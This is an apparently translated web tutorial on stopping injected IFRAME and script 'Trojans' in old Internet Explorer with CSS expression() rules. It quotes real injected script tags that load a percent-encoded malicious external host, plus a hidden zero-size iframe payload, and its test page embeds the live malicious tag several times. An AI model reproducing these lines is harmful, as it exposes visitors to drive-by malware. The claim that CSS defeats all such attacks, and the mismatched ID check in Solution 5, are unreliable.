One or two lines of code solve all webpage Trojans

Source: Internet
Author: User

The following code is used to solve the problem:

I believe most of my friends have been victims of IFRAME Trojans, and some have had IFRAMEs injected into their pages. Moreover, IFRAMEs are easily injected through ARP attacks, so the LAN is always under threat. The New Year is approaching. To prevent more friends from being attacked, I will explain it in detail.

Linger once posted on the Classic Forum: one line of code as an IFRAME Trojan defense for websites. Many friends have contacted linger; some are grateful, but more have questions. Let's take a closer look at the principles today:

IE only: generally only IE is vulnerable to Trojans such as IFRAME ones, so linger deals with IE first.

Before reading this article, let's take a look at expression.

IE5 and later versions support the use of expression in CSS to associate CSS attributes with JavaScript. The CSS attributes here can be inherent attributes of an element or custom attributes. That is to say, a CSS attribute can be followed by a JavaScript expression, and the value of the CSS attribute equals the result of evaluating that expression. Within the expression you can directly reference the element's own attributes and methods, or use other browser objects, as if the expression were a member function of the element.

Many of my friends know that CSS can directly describe the appearance of a visual tag. For example, p {color: red} means the text in all P tags on the webpage turns red. Isn't IFRAME a tag too? Start writing code with linger:
iframe { ...write the CSS code describing the appearance here... }

Think about it: what is the best way to prevent the content in an IFRAME from being downloaded? The core is to cut off the requests in the IFRAME, and to cut off the requests you quickly destroy the IFRAME object. How to implement it? Wasn't expression introduced above? expression can execute JS. The syntax is as follows:

inherent CSS attribute name of the tag: expression(JS expression);
or custom attribute name: expression(JS expression);

Here we choose the second form. The code should look like this: iframe { v: expression(JS expression); }

The next question is how to destroy all IFRAME objects on the webpage. The principle, using JS, is as follows: change the request address of the IFRAME to a blank page (about:blank), and then remove the IFRAME object from the DOM (Document Object Model) to cut off all requests in the IFRAME. There are many ways to remove DOM nodes; I will use the outerHTML property here. The CSS code is as follows:

iframe { v: expression(this.src='about:blank', this.outerHTML=''); }

Note: The v above is a custom CSS attribute defined by linger. iframe here selects all IFRAME objects whose appearance is being described. The comma in the middle means the two statements are executed together, with no execution priority between them, which is a strong guarantee. about:blank is a blank page, as everyone knows. The outerHTML property is the HTML code of a DOM object including the object itself, while innerHTML is the HTML code contained in the DOM object (excluding itself).

The code is ready; let's test whether it works.

First, create a new webpage and insert the above CSS code (or add the above line to your existing CSS code):

<style type="text/css">
iframe { v: expression(this.src='about:blank', this.outerHTML=''); }
</style>

Then insert several IFRAMEs on this page, assuming they are Trojans. The code is as follows:

<iframe src="http://www.baidu.com"></iframe> Baidu
<iframe src="http://www.126.com/"></iframe> 126 mailbox
<iframe src="http://www.163.com"></iframe> Netease

Save it as noiframe.htm and open it in the browser to test. (When testing locally, you need to allow the blocked script in the prompt bar at the top.) I used a packet capture tool for testing here, but there is no need to bother with one. The simplest and most effective method is to open IE's cache folder, clear it first, then refresh the page and see whether any files from these three websites appear in the cache folder. If not, no request was made. The test result is satisfactory. I have a smile on my face ^ *. At this time, my colleague handed me a piece of cake, which is delicious.

Tip: Windows XP SP2 cache folder Location C:/Documents and Settings/Administrator/Local Settings/Temporary Internet Files

Careful friends found a problem: what should I do if I want to use an IFRAME on my own webpage?

A: If you want your own IFRAME to display on the page while other IFRAME Trojans still do not work, add #f126 { v: expression() !important } to the CSS.
The corresponding IFRAME code is:

<iframe id="f126" name="f126" src="http://www.126.com/"></iframe>

OK.

Tip: IE7 applies styles marked !important first. IE6 does not recognize !important and uses the proximity principle, so the code for IE6 can be placed at the end of the CSS.

Many of my friends have questions about f126. They asked me why I chose "f126", and my answer is: this f126 is arbitrary, as long as the ID attribute of the IFRAME below is consistent with the one in the CSS. My colleague wanted to hand me another piece of cake. I said I was full.

Of course, the Trojan can construct code like this:

<iframe style="v: expression() !important" src="url"></iframe>

This invalidates my defense method, but the attacker has to look up the attribute name v used for IFRAME in my CSS code. If I change my v, haha, it no longer works!

Summary:
The above method only stops the IFRAME request and destroys the IFRAME itself, but Trojan-mounting methods may change in the future. For example, this method cannot be used against the <script></script> method. It is not the final solution; the final solution is to find the real cause of the IFRAME injection and block the source. This is not my business, huh ~

Application example: http://www.cncert.net uses this code together with MD5 (hash) verification, a near-perfect anti-Trojan solution.

Discussion on the Classic Forum:
http://bbs.blueidea.com/thread-2818052-1-1.html

 

 

The following code is used to solve the problem:

It's still the Trojan-mounting problem. During this period I have gradually felt a lot of pressure. More and more people have been adding me on QQ or MSN, and my work has been very busy recently. Ah, thinking about it, I still have to take the time to help you.

Not long ago, the one-line-of-code solution for IFRAME Trojans (including server injection, client ARP injection, etc.) at http://bbs.blueidea.com/thread-2818052-1-1.html was recognized by many friends, and it is indeed a good way to ride out the storm. But now the Trojan-mounting method has changed, just as I expected. The <script> Trojan is now popular, sweat. I looked at the websites of several netizens; the following had been added to the top or bottom of the page:

Note: The following addresses contain Trojans, so do not access them easily:

<SCRIPT src = http: // % 76% 63% 63% 64% 2e % 63% 6e> </SCRIPT>
<SCRIPT src = http: // % 76% 63% 63% 64% 2e % 63% 6e> </SCRIPT>
<SCRIPT src = http: // % 76% 63% 63% 64% 2e % 63% 6e> </SCRIPT>
<SCRIPT src = http: // % 76% 63% 63% 64% 2e % 63% 6e> </SCRIPT>
<SCRIPT src = http: // % 76% 63% 63% 64% 2e % 63% 6e> </SCRIPT>
<SCRIPT src = http: // % 76% 63% 63% 64% 2e % 63% 6e> </SCRIPT>
<SCRIPT src = http: // % 76% 63% 63% 64% 2e % 63% 6e> </SCRIPT>
<SCRIPT src = http: // % 76% 63% 63% 64% 2e % 63% 6e> </SCRIPT>

Sweat, n identical <script> tags inserted in a row. With every patch installed on the computer, I visited http: // % 76% 63% 63% 64% 63% 2e % 6e directly (or you can download it directly with Thunder), and this is what appeared:

document.write("<div style='display:none'>")
document.write("<iframe src=http://a.158dm.com/b1.htm?id=017 width=0 height=0></iframe>")
document.write("</div>")

Download ghost again with thunder. The charge is quite high!

...
var kfqq, qqs = "784378237"; qwfgsg = "llll//xxxxxld"; kfqq = qqs;
(... omitted) (n pieces of statistics JS code follow below)

I can't ignore the above situation. Let me think of a solution, bro. I drank a bowl of green bean porridge with a lot of sugar; it was good. Then I thought of the solution. The answer comes from a little analysis. Let's take a look at the features of <script> Trojans:

<SCRIPT src = http: // % 76% 63% 63% 64% 2e % 63% 6e> </SCRIPT>

By the way, the src of a script Trojan generally comes from an external domain, that is, the src starts with http. A script from your own website does not need the http prefix. Then look at the Trojan's original form: it still outputs IFRAME, JS code, or other <object> code. No matter how many there are, kill them all.
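The feature described above, a tag whose src points at an external domain, can also be checked on the server side against the HTML a site actually serves, which helps locate where the injection happens. The following Python scanner is an added example, not code from linger's post; the OWN_HOSTS allowlist, the function names and the sample page (with example.test as a stand-in host) are assumptions made for illustration. It goes beyond the indexOf('http') test by also catching scheme-relative //host URLs and percent-encoded hostnames, and by not flagging absolute URLs that point at the site's own host.

```python
from html.parser import HTMLParser
from urllib.parse import unquote, urlsplit

OWN_HOSTS = {"www.example.org"}  # assumption: hosts this site really loads from


class InjectionScanner(HTMLParser):
    """Collect <script>/<iframe> tags whose src leaves the site's own hosts."""
    def __init__(self, own_hosts):
        super().__init__()
        self.own_hosts = own_hosts
        self.findings = []  # (tag, decoded host, reasons)

    def handle_starttag(self, tag, attrs):
        if tag not in ("script", "iframe"):
            return
        a = {k: (v or "") for k, v in attrs}
        src = a.get("src", "").strip()
        # //host/x.js is external too although it does not start with "http".
        parts = urlsplit("http:" + src if src.startswith("//") else src)
        if parts.scheme not in ("http", "https"):
            return  # relative path: served from this site
        host = unquote(parts.hostname or "").lower()
        if host in self.own_hosts:
            return  # absolute URL, but still our own host
        reasons = ["external src"]
        if "%" in parts.netloc:
            reasons.append("percent-encoded host")
        if tag == "iframe" and a.get("width") == a.get("height") == "0":
            reasons.append("zero-size frame")
        self.findings.append((tag, host, reasons))


def scan(html, own_hosts=OWN_HOSTS):
    scanner = InjectionScanner(own_hosts)
    scanner.feed(html)
    return scanner.findings


# Constructed sample page; example.test stands in for an injected host.
SAMPLE = """
<script type="text/javascript" src="1.js"></script>
<script src="http://www.example.org/lib.js"></script>
<script src=http://%65%78%61%6d%70%6c%65%2e%74%65%73%74></script>
<SCRIPT SRC="//cdn.example.test/a.js"></SCRIPT>
<div style="display:none"><iframe src=http://example.test/b.htm?id=1 width=0 height=0></iframe></div>
"""

if __name__ == "__main__":
    print(*scan(SAMPLE), sep="\n")
```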

Let's write CSS with me and solve them one by one. I wrote five different solutions. Let's test them:

Solution 1:

iframe { n1ifm: expression(this.src='about:blank', this.outerHTML=''); } /* this line of code solves the IFRAME Trojan problem */
script { nojs1: expression((this.src.toLowerCase().indexOf('http')==0) ? document.write('Trojan is isolated successfully!') : ''); }

Principle: convert the src of the <script> tag to lowercase and check whether it starts with "http", that is, whether it is a JS file from an external domain. If so, the page content is cleared and "Trojan is isolated successfully!" is written. Otherwise, the page is displayed normally.

Disadvantage: the visitor cannot see the page infected with the <SCRIPT> Trojan.

Solution 2:

iframe { nifm2: expression(this.src='about:blank', this.outerHTML=''); }
script { no2js: expression((this.src.toLowerCase().indexOf('http')==0) ? document.close() : ''); }

Principle: use document.close() to forcibly shut off document.write() from JS files in external domains. At that point the Trojan content has not been fully written: only the part already buffered is output, and the rest will not be written.

 

Solution 3:

iframe { ni3fm: expression(this.src='about:blank', this.outerHTML=''); }
script { n3ojs: expression((this.src.toLowerCase().indexOf('http')==0) ? document.execCommand('stop') : ''); }

Principle: as before, when a JS file from an external domain is found, immediately call IE's private execCommand method to stop all requests on the page, so the subsequent external-domain JS files are also forced to stop downloading. It is just like clicking the "Stop" button in the browser; in effect, this is how JS simulates IE's stop button.

Solution 4:

iframe { nif4m: expression(this.src='about:blank', this.outerHTML=''); }
script { noj4s: expression(if(this.src.indexOf('http')==0) this.src='res://ieframe.dll/dnserror.htm'); }

Principle: overwrite the src of the external-domain JS file with the address of IE's 404 error page. In this way, the JS code from the external domain will not be downloaded.

Solution 5:

iframe { nifm5: expression(this.src='about:blank', this.outerHTML=''); }
script { noj5s: expression((this.id.toLowerCase().indexOf('vok')!=-1) ? document.write('Trojan is isolated successfully!') : ''); }

In the fifth solution, you must add an ID prefixed with "LH" to the <script> tags in the page's HTML source, such as lhweatherjsapi, for example <script src="***/**.js" id="lhsearchjsapi"></script>

The code of the following page contains a Trojan address, which is repeated six times on the page. You can test it with the different methods above to see how I studied it! (This test is dangerous. Make sure all patches are installed before testing.)

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>CSS code that allows the JS Trojan process to stop quickly</title>
<style type="text/css" id="linrstudio">
/*<![CDATA[*/
iframe { nhk1: expression(this.src='about:blank', this.outerHTML=''); }
script { ngz1: expression((this.src.indexOf('http')==0) ? document.close() : ''); }
/* Later please pay attention to the latest Trojan processing method: http://www.nihaoku.cn/ff/api.htm */
/*]]>*/
</style>
</head>
<body>
<script type="text/javascript" src="1.js"></script>
<SCRIPT src = http: // % 76% 63% 63% 64% 2e % 63% 6e> </SCRIPT>
<SCRIPT src = "http: // % 76% 63% 63% 64% 2e % 63% 6e" type = "text/JavaScript"> </SCRIPT>
<SCRIPT src = http: // % 76% 63% 63% 64% 2e % 63% 6e> </SCRIPT>
I am the page itself, 1
<SCRIPT src = http: // % 76% 63% 63% 64% 2e % 63% 6e> </SCRIPT>
I am the page itself, 2
<SCRIPT src = http: // % 76% 63% 63% 64% 2e % 63% 6e> </SCRIPT>
I am the page itself, 3
<SCRIPT src = http: // % 76% 63% 63% 64% 2e % 63% 6e> </SCRIPT>
</body>
</html>

Here 1.js is a file on the site itself:

document.write("I am a JS file on this site");
document.write(" ");

My test environment is:

Windows XP SP2 and Windows Vista SP1
IE6/IE7/IE8
All patches have been installed.

In summary, all the current Trojan-mounting methods have been cracked, and CSS can be used to solve all the Trojan problems, so that visitors will not be easily infected.

You should also look closely for bugs in my code. If you find any, be sure to raise them so we can solve the problem! Or you may have a better way; let's discuss it.

Discussion on the Classic Forum:
http://bbs.blueidea.com/thread-2841460-1-1.html
